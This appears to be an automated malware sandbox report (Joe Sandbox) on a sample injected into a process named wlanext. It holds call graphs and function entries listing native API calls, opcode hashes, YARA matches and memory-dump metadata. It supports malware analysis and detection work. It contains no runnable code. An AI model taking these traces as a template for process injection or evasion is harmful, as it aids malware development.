328cf80 LdrLoadDll RtlFreeHeap 33929->34043 33931->33794 33933 3285391 33932->33933 33934 3284a40 8 API calls 33933->33934 33935 32853a7 33934->33935 33936 32853e2 33935->33936 33937 32853f5 33935->33937 33941 32853fa 33935->33941 33938 328bdb0 2 API calls 33936->33938 33939 328bdb0 2 API calls 33937->33939 33940 32853e7 33938->33940 33939->33941 33940->33799 33941->33799 34044 328ac20 33942->34044 33945 328ac20 LdrLoadDll 33946 328ad7d 33945->33946 33947 328ac20 LdrLoadDll 33946->33947 33948 328ad86 33947->33948 33949 328ac20 LdrLoadDll 33948->33949 33950 328ad8f 33949->33950 33951 328ac20 LdrLoadDll 33950->33951 33952 328ad98 33951->33952 33953 328ac20 LdrLoadDll 33952->33953 33954 328ada1 33953->33954 33955 328ac20 LdrLoadDll 33954->33955 33956 328adad 33955->33956 33957 328ac20 LdrLoadDll 33956->33957 33958 328adb6 33957->33958 33959 328ac20 LdrLoadDll 33958->33959 33960 328adbf 33959->33960 33961 328ac20 LdrLoadDll 33960->33961 33962 328adc8 33961->33962 33963 328ac20 LdrLoadDll 33962->33963 33964 328add1 33963->33964 33965 328ac20 LdrLoadDll 33964->33965 33966 328adda 33965->33966 33967 328ac20 LdrLoadDll 33966->33967 33968 328ade6 33967->33968 33969 328ac20 LdrLoadDll 33968->33969 33970 328adef 33969->33970 33971 328ac20 LdrLoadDll 33970->33971 33972 328adf8 33971->33972 33973 328ac20 LdrLoadDll 33972->33973 33974 328ae01 33973->33974 33975 328ac20 LdrLoadDll 33974->33975 33976 328ae0a 33975->33976 33977 328ac20 LdrLoadDll 33976->33977 33978 328ae13 33977->33978 33979 328ac20 LdrLoadDll 33978->33979 33980 328ae1f 33979->33980 33981 328ac20 LdrLoadDll 33980->33981 33982 328ae28 33981->33982 33983 328ac20 LdrLoadDll 33982->33983 33984 328ae31 33983->33984 33985 328ac20 LdrLoadDll 33984->33985 33986 328ae3a 33985->33986 33987 328ac20 LdrLoadDll 33986->33987 33988 328ae43 33987->33988 33989 328ac20 LdrLoadDll 33988->33989 33990 328ae4c 33989->33990 33991 328ac20 LdrLoadDll 33990->33991 33992 328ae58 33991->33992 33993 328ac20 LdrLoadDll 33992->33993 33994 328ae61 33993->33994 33995 328ac20 LdrLoadDll 33994->33995 33996 328ae6a 33995->33996 33997 328ac20 LdrLoadDll 33996->33997 33998 328ae73 33997->33998 33999 328ac20 LdrLoadDll 33998->33999 34000 328ae7c 33999->34000 34001 328ac20 LdrLoadDll 34000->34001 34002 328ae85 34001->34002 34003 328ac20 LdrLoadDll 34002->34003 34004 328ae91 34003->34004 34005 328ac20 LdrLoadDll 34004->34005 34006 328ae9a 34005->34006 34007 328ac20 LdrLoadDll 34006->34007 34008 328aea3 34007->34008 34009 328ac20 LdrLoadDll 34008->34009 34010 328aeac 34009->34010 34011 328ac20 LdrLoadDll 34010->34011 34012 328aeb5 34011->34012 34013 328ac20 LdrLoadDll 34012->34013 34014 328aebe 34013->34014 34015 328ac20 LdrLoadDll 34014->34015 34016 328aeca 34015->34016 34017 328ac20 LdrLoadDll 34016->34017 34018 328aed3 34017->34018 34019 328ac20 LdrLoadDll 34018->34019 34020 328aedc 34019->34020 34020->33802 34022 328af50 LdrLoadDll 34021->34022 34023 3289ecc 34022->34023 34050 3529860 LdrInitializeThunk 34023->34050 34024 3289ee3 34024->33731 34026->33798 34028 328cf30 34027->34028 34029 328cf36 34027->34029 34028->33904 34030 328bf80 2 API calls 34029->34030 34031 328cf5c 34030->34031 34031->33904 34033 328cfc0 34032->34033 34034 328bf80 2 API calls 34033->34034 34035 328d01d 34033->34035 34036 328cffa 34034->34036 34035->33911 34037 328bdb0 2 API calls 34036->34037 34037->34035 34038->33908 34039->33922 34040->33924 34041->33926 34042->33929 34043->33931 34045 328ac3b 34044->34045 34046 3284e40 LdrLoadDll 34045->34046 34047 328ac5b 34046->34047 34048 3284e40 LdrLoadDll 34047->34048 34049 328ad07 34047->34049 34048->34049 34049->33945 34050->34024 34052 3529681 34051->34052 34053 352968f LdrInitializeThunk 34051->34053 34052->33808 34053->33808 34055 328af50 LdrLoadDll 34054->34055 34056 328a67c RtlFreeHeap 34055->34056 34056->33811 34058 3277eb0 34057->34058 34059 3277eab 34057->34059 34060 328bd30 2 API calls 34058->34060 34059->33739 34063 3277ed5 34060->34063 34061 3277f38 34061->33739 34062 3289eb0 2 API calls 34062->34063 34063->34061 34063->34062 34064 3277f3e 34063->34064 34069 328bd30 2 API calls 34063->34069 34073 328a5b0 34063->34073 34066 3277f64 34064->34066 34067 328a5b0 2 API calls 34064->34067 34066->33739 34068 3277f55 34067->34068 34068->33739 34069->34063 34071 328a5b0 2 API calls 34070->34071 34072 327817e 34071->34072 34072->33698 34074 328af50 LdrLoadDll 34073->34074 34075 328a5cc 34074->34075 34078 35296e0 LdrInitializeThunk 34075->34078 34076 328a5e3 34076->34063 34078->34076 34080 328b5b3 34079->34080 34081 327ace0 LdrLoadDll 34080->34081 34082 3279c3a 34081->34082 34082->33706 34084 327b053 34083->34084 34086 327b0d0 34084->34086 34098 3289c80 LdrLoadDll 34084->34098 34086->33713 34088 327f1ab 34087->34088 34089 328af50 LdrLoadDll 34087->34089 34088->33716 34090 328a7c0 34088->34090 34089->34088 34091 328af50 LdrLoadDll 34090->34091 34092 328a7df LookupPrivilegeValueW 34091->34092 34092->33718 34094 328af50 LdrLoadDll 34093->34094 34095 328a26c 34094->34095 34099 3529910 LdrInitializeThunk 34095->34099 34096 328a28b 34096->33719 34098->34086 34099->34096 34101 327b1b9 34100->34101 34102 327b030 LdrLoadDll 34101->34102 34103 327b1f4 34102->34103 34103->33651 34105 327af24 34104->34105 34177 3289c80 LdrLoadDll 34105->34177 34107 327af5e 34107->33653 34109 327f39c 34108->34109 34110 327b1b0 LdrLoadDll 34109->34110 34111 327f3ae 34110->34111 34178 327f280 34111->34178 34114 327f3e1 34117 327f3f2 34114->34117 34119 328a480 2 API calls 34114->34119 34115 327f3c9 34116 327f3d4 34115->34116 34118 328a480 2 API calls 34115->34118 34116->33656 34117->33656 34118->34116 34119->34117 34121 327f42c 34120->34121 34197 327b2a0 34121->34197 34123 327f43e 34124 327f280 3 API calls 34123->34124 34125 327f44f 34124->34125 34126 327f471 34125->34126 34127 327f459 34125->34127 34129 327f482 34126->34129 34131 328a480 2 API calls 34126->34131 34128 327f464 34127->34128 34130 328a480 2 API calls 34127->34130 34128->33658 34129->33658 34130->34128 34131->34129 34133 327ca96 34132->34133 34134 327caa0 34132->34134 34133->33667 34135 327af00 LdrLoadDll 34134->34135 34136 327cb3e 34135->34136 34137 327cb64 34136->34137 34138 327b030 LdrLoadDll 34136->34138 34137->33667 34139 327cb80 34138->34139 34140 3284a40 8 API calls 34139->34140 34141 327cbd5 34140->34141 34141->33667 34143 327d636 34142->34143 34144 327b030 LdrLoadDll 34143->34144 34145 327d64a 34144->34145 34201 327d300 34145->34201 34147 327908b 34148 327cbf0 34147->34148 34149 327cc16 34148->34149 34150 327b030 LdrLoadDll 34149->34150 34151 327cc99 34149->34151 34150->34151 34152 327b030 LdrLoadDll 34151->34152 34153 327cd06 34152->34153 34154 327af00 LdrLoadDll 34153->34154 34155 327cd6f 34154->34155 34156 327b030 LdrLoadDll 34155->34156 34157 327ce1f 34156->34157 34157->33681 34230 327f6c0 34158->34230 34160 3278f25 34160->33639 34161 3278d14 34161->34160 34235 3284390 34161->34235 34163 3278d70 34163->34160 34238 3278ab0 34163->34238 34166 328cf20 2 API calls 34167 3278db2 34166->34167 34168 328d050 3 API calls 34167->34168 34172 3278dc7 34168->34172 34169 3277ea0 4 API calls 34169->34172 34172->34160 34172->34169 34173 3278160 2 API calls 34172->34173 34174 327c7a0 18 API calls 34172->34174 34243 327f660 34172->34243 34247 327f070 21 API calls 34172->34247 34173->34172 34174->34172 34175->33660 34176->33678 34177->34107 34179 327f29a 34178->34179 34187 327f350 34178->34187 34180 327b030 LdrLoadDll 34179->34180 34181 327f2bc 34180->34181 34188 3289f30 34181->34188 34183 327f2fe 34191 3289f70 34183->34191 34186 328a480 2 API calls 34186->34187 34187->34114 34187->34115 34189 328af50 LdrLoadDll 34188->34189 34190 3289f4c 34189->34190 34190->34183 34192 3289f8c 34191->34192 34193 328af50 LdrLoadDll 34191->34193 34196 3529fe0 LdrInitializeThunk 34192->34196 34193->34192 34194 327f344 34194->34186 34196->34194 34198 327b2c7 34197->34198 34199 327b030 LdrLoadDll 34198->34199 34200 327b303 34199->34200 34200->34123 34202 327d317 34201->34202 34210 327f700 34202->34210 34206 327d38b 34207 327d392 34206->34207 34221 328a290 LdrLoadDll 34206->34221 34207->34147 34209 327d3a5 34209->34147 34211 327f725 34210->34211 34222 32781a0 34211->34222 34213 327d35f 34218 328a6d0 34213->34218 34214 3284a40 8 API calls 34216 327f749 34214->34216 34216->34213 34216->34214 34217 328bdb0 2 API calls 34216->34217 34229 327f540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 34216->34229 34217->34216 34219 328af50 LdrLoadDll 34218->34219 34220 328a6ef CreateProcessInternalW 34219->34220 34220->34206 34221->34209 34223 327829f 34222->34223 34224 32781b5 34222->34224 34223->34216 34224->34223 34225 3284a40 8 API calls 34224->34225 34226 3278222 34225->34226 34227 328bdb0 2 API calls 34226->34227 34228 3278249 34226->34228 34227->34228 34228->34216 34229->34216 34231 3284e40 LdrLoadDll 34230->34231 34232 327f6df 34231->34232 34233 327f6e6 SetErrorMode 34232->34233 34234 327f6ed 34232->34234 34233->34234 34234->34161 34248 327f490 34235->34248 34237 32843b6 34237->34163 34239 328bd30 2 API calls 34238->34239 34240 3278ad5 34239->34240 34241 3278cea 34240->34241 34267 3289870 34240->34267 34241->34166 34244 327f673 34243->34244 34315 3289e80 34244->34315 34247->34172 34249 327f4ad 34248->34249 34255 3289fb0 34249->34255 34252 327f4f5 34252->34237 34256 3289fcc 34255->34256 34257 328af50 LdrLoadDll 34255->34257 34265 35299a0 LdrInitializeThunk 34256->34265 34257->34256 34258 327f4ee 34258->34252 34260 328a000 34258->34260 34261 328af50 LdrLoadDll 34260->34261 34262 328a01c 34261->34262 34266 3529780 LdrInitializeThunk 34262->34266 34263 327f51e 34263->34237 34265->34258 34266->34263 34268 328bf80 2 API calls 34267->34268 34269 3289887 34268->34269 34288 3279310 34269->34288 34271 32898a2 34272 32898c9 34271->34272 34273 32898e0 34271->34273 34274 328bdb0 2 API calls 34272->34274 34276 328bd30 2 API calls 34273->34276 34275 32898d6 34274->34275 34275->34241 34277 328991a 34276->34277 34278 328bd30 2 API calls 34277->34278 34279 3289933 34278->34279 34285 3289bd4 34279->34285 34294 328bd70 LdrLoadDll 34279->34294 34281 3289bb9 34282 3289bc0 34281->34282 34281->34285 34283 328bdb0 2 API calls 34282->34283 34284 3289bca 34283->34284 34284->34241 34286 328bdb0 2 API calls 34285->34286 34287 3289c29 34286->34287 34287->34241 34289 3279335 34288->34289 34290 327ace0 LdrLoadDll 34289->34290 34291 3279368 34290->34291 34293 327938d 34291->34293 34295 327cf10 34291->34295 34293->34271 34294->34281 34296 327cf3c 34295->34296 34297 328a1d0 LdrLoadDll 34296->34297 34298 327cf55 34297->34298 34299 327cf5c 34298->34299 34306 328a210 34298->34306 34299->34293 34303 327cf97 34304 328a480 2 API calls 34303->34304 34305 327cfba 34304->34305 34305->34293 34307 328af50 LdrLoadDll 34306->34307 34308 328a22c 34307->34308 34314 3529710 LdrInitializeThunk 34308->34314 34309 327cf7f 34309->34299 34311 328a800 34309->34311 34312 328af50 LdrLoadDll 34311->34312 34313 328a81f 34312->34313 34313->34303 34314->34309 34316 328af50 LdrLoadDll 34315->34316 34317 3289e9c 34316->34317 34320 3529840 LdrInitializeThunk 34317->34320 34318 327f69e 34318->34172 34320->34318

                                  Executed Functions

                                  Function 0328A34A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 285 328a34a-328a3a1 call 328af50 NtCreateFile
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,03284BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03284BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0328A39D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Offset: 03270000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_3270000_wlanext.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 56d3d17d3bb9d3eb81a87ffb769acbe5f66fe2dc24ba45861dc4172ae75816ba
                                  • Instruction ID: bd62294ad0c6f97997a1d1b363bd88466ed557edf8c83af4cd196de68fe32e0a
                                  • Opcode Fuzzy Hash: 56d3d17d3bb9d3eb81a87ffb769acbe5f66fe2dc24ba45861dc4172ae75816ba
                                  • Instruction Fuzzy Hash: 8B01EFB2600208AFCB48CF88DC80EEB37A9AF8C354F118258BA0D97240D630E8118BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0328A350 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 288 328a350-328a366 289 328a36c-328a3a1 NtCreateFile 288->289 290 328a367 call 328af50 288->290 290->289
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,03284BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03284BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0328A39D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Offset: 03270000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_3270000_wlanext.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction ID: ba9eef552e0023c7c59878b573b90a03adeca10c2069be87e17eb897afc5bece
                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction Fuzzy Hash: 31F0B2B2211208AFCB08DF88DC84EEB77ADAF8C754F158248BA1D97240C630E8518BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0328A400 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtReadFile.NTDLL(03284D62,5EB65239,FFFFFFFF,03284A21,?,?,03284D62,?,03284A21,FFFFFFFF,5EB65239,03284D62,?,00000000), ref: 0328A445
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Offset: 03270000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_3270000_wlanext.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction ID: f1a6279ed1116f9bb3c9edf763941a39715d8f8b2185b43fabbd52a7795ff934
                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction Fuzzy Hash: D3F0B7B6210208AFCB14DF89DC80EEB77ADEF8C754F158249BE1D97241DA30E851CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0328A52D Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03272D11,00002000,00003000,00000004), ref: 0328A569
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Offset: 03270000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_3270000_wlanext.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: ad2b51e75fcb9892d9053ed7b2fa9e1fbf8201b8daa3de248471608bb71ded53
                                  • Instruction ID: 7a32132c2cd5fb6bcc67ae36c1d1b1b38eec9a29819f00517264112f35b40e3c
                                  • Opcode Fuzzy Hash: ad2b51e75fcb9892d9053ed7b2fa9e1fbf8201b8daa3de248471608bb71ded53
                                  • Instruction Fuzzy Hash: 1AF01CB5210208AFCB14DF88DC80EE777A9AF8C254F118149BA1C97241C631E811CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0328A530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03272D11,00002000,00003000,00000004), ref: 0328A569
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Offset: 03270000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_3270000_wlanext.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction ID: 80621b007ba9601489e95bb0d598d8f548a69ca722d7e0dfadaab99d3ba91c9c
                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction Fuzzy Hash: A7F015B6210208AFCB14DF89CC80EAB77ADAF88654F118149BE1C97241C630F810CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0328A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.NTDLL(03284D40,?,?,03284D40,00000000,FFFFFFFF), ref: 0328A4A5
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Offset: 03270000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_3270000_wlanext.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction ID: c80f9f74004de9589bb0825d8c489efbb40e99e2f6a980545868da78b29c5e6d
                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction Fuzzy Hash: 92D01776200314ABD720EB98CC85EA77BACEF48660F154499BA1C9B282C970FA0086E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0328A484 Relevance: 1.5, APIs: 1, Instructions: 16nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.NTDLL(03284D40,?,?,03284D40,00000000,FFFFFFFF), ref: 0328A4A5
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Offset: 03270000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_3270000_wlanext.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 7e35bfbf6aeaa78e0442cf51e3dd4b58abda6e98e08a48f0e67da3b15cbe78bf
                                  • Instruction ID: 9d750192d45861852620d85682ba3598c53105f8d032ae6c39fabe436ed08b30
                                  • Opcode Fuzzy Hash: 7e35bfbf6aeaa78e0442cf51e3dd4b58abda6e98e08a48f0e67da3b15cbe78bf
                                  • Instruction Fuzzy Hash: E2D0A7AD40E3C04FCB21FBB464C00C67F40DE511187144ACEE4AC0B647D565D2199391
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03529A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 47dce845ed470e61e22662be9d5b12d61d5c3fec53f80a69529b9aea1bad6b18
                                  • Instruction ID: 86545406cf35a3b7e03d7989c100fedd5d12abf11e00cb24378593652c9a6575
                                  • Opcode Fuzzy Hash: 47dce845ed470e61e22662be9d5b12d61d5c3fec53f80a69529b9aea1bad6b18
                                  • Instruction Fuzzy Hash: 5090026136184842D200A5695C14B0701A5A7D1343F51C115A0144755CCA5588716561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03529910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1c8448a7d8533b2ae9dda4b4728fe567685195b9ffe2f5111a5525264bf47381
                                  • Instruction ID: f27aa4616cd8ecfab1be706cca8706c106ae5fb15beafbf555161bde6e428a02
                                  • Opcode Fuzzy Hash: 1c8448a7d8533b2ae9dda4b4728fe567685195b9ffe2f5111a5525264bf47381
                                  • Instruction Fuzzy Hash: 399002B135104C02D140B159540474601A5A7D1342F51C011A5054755E87998DE576A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035299A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 23d899fece805b9010164b5ee9cdbebdfaccaf5630f14e0dccdf3625cf41ed54
                                  • Instruction ID: c1d4ca25bb689418c89efeee7aa08e9a72298d0e398078b3f7c72917f8eea616
                                  • Opcode Fuzzy Hash: 23d899fece805b9010164b5ee9cdbebdfaccaf5630f14e0dccdf3625cf41ed54
                                  • Instruction Fuzzy Hash: 409002A139104C42D100A1595414B0601A5E7E2342F51C015E1054755D8759CC627166
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03529840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7d99bad3a1ce7110519d46baabf36cdc02a52a2868c89247cb8672abaa97746d
                                  • Instruction ID: 19e6ba2c06885a57e72c05e4698db1165890715038021018c3023fe94b5d4cf6
                                  • Opcode Fuzzy Hash: 7d99bad3a1ce7110519d46baabf36cdc02a52a2868c89247cb8672abaa97746d
                                  • Instruction Fuzzy Hash: 4B900261392089525545F159540450741A6B7E1282791C012A1404B51C86669866E661
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03529860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5fe1d9ef684bd479fd89a62f1b6397a4104f281f01a3ad5af64f38ab61de70d7
                                  • Instruction ID: 43616756af813a3f8ff5b94b400f4c8d1fae6dd82f34d74e7667e1ba1151b2d1
                                  • Opcode Fuzzy Hash: 5fe1d9ef684bd479fd89a62f1b6397a4104f281f01a3ad5af64f38ab61de70d7
                                  • Instruction Fuzzy Hash: 7F90027135104C13D111A159550470701A9A7D1282F91C412A0414759D97968962B161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03529710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8252607bab2ca6cab418ed307eeb467ffaaeca197275232684d69cd14e503027
                                  • Instruction ID: 9bc642adab71a25346a79aded7c7825b9dce8782bed784ebce0d4364aae578ae
                                  • Opcode Fuzzy Hash: 8252607bab2ca6cab418ed307eeb467ffaaeca197275232684d69cd14e503027
                                  • Instruction Fuzzy Hash: F090027135104C02D100A599640864601A5A7E1342F51D011A5014756EC7A588A17171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03529FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9c7be0c327e349f94c78b100c940c78463b91c1606b4b90bc5ada52c35ed375b
                                  • Instruction ID: b70d39da948448ad4120dc41d706b28e6350334f929730d9d9dd54b92f73d2a4
                                  • Opcode Fuzzy Hash: 9c7be0c327e349f94c78b100c940c78463b91c1606b4b90bc5ada52c35ed375b
                                  • Instruction Fuzzy Hash: 0C90027136118C02D110A159940470601A5A7D2242F51C411A0814759D87D588A17162
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03529780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
